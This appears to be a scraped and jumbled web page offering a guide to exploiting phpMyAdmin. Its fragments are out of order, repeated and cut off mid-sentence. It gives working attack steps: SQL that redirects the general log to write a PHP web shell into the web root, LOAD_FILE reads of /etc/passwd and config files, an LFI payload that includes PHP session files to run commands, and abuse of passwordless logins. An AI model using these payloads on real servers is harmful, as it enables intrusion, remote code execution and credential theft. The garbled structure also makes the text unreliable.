Verified: phpMyAdmin 5.1.1 leaks version in the default CSS comment: /* v5.1.1 */ .
SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file = '/var/www/html/shell.php'; SELECT "<?php system($_GET['c']); ?>"; -- This gets written to log file
If the administrator enabled the AllowNoPassword directive in config.inc.php , any database user without a password set can log in remotely. This frequently grants access to low-privilege users who can then look for local privilege escalation vectors. Brute Force Attacks
Some setups hide it under a random or custom path, but default installations are predictable. phpmyadmin hacktricks verified
Exploiting phpMyAdmin: A Comprehensive Security Guide phpMyAdmin is a widely used web-based interface for managing MySQL and MariaDB databases. Because it often holds the keys to an organization's most sensitive data, it is a frequent target for penetration testers and malicious actors alike.
If the database user has the FILE privilege and the MySQL variable secure_file_priv is empty or misconfigured, you can write a PHP web shell directly to the web root. Execute the following SQL query in the phpMyAdmin SQL tab:
phpMyAdmin is one of the most widely deployed web-based administration tools for MySQL and MariaDB databases. Because it bridges web applications and database layers, it is a high-value target for security auditors and penetration testers. Verified: phpMyAdmin 5
Note: This requires the MySQL variable secure_file_priv to be blank or point to the directory containing the target file. Writing Webshells (INTO OUTFILE)
Before attempting any exploitation, you must gather data about the target instance to map out your attack surface. Version Detection
Trigger the LFI via the vulnerable parameter to include the session file: index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_[SESSION_ID] Append the &cmd=id parameter to execute system commands. Setup Script Remote Code Execution (CVE-2009-1151) Brute Force Attacks Some setups hide it under
SELECT LOAD_FILE('/etc/passwd'); SELECT LOAD_FILE('/var/www/html/config.php');
If OUTFILE is blocked directly, create a table, insert the shell, and then export it. B. Log File Manipulation
Look for $cfg['Servers'][$i]['password'] .
If the file_priv is enabled for your user, read local system files directly via SQL: SELECT LOAD_FILE('/etc/passwd'); Use code with caution.
© 2026 LF Frontier. All rights reserved.
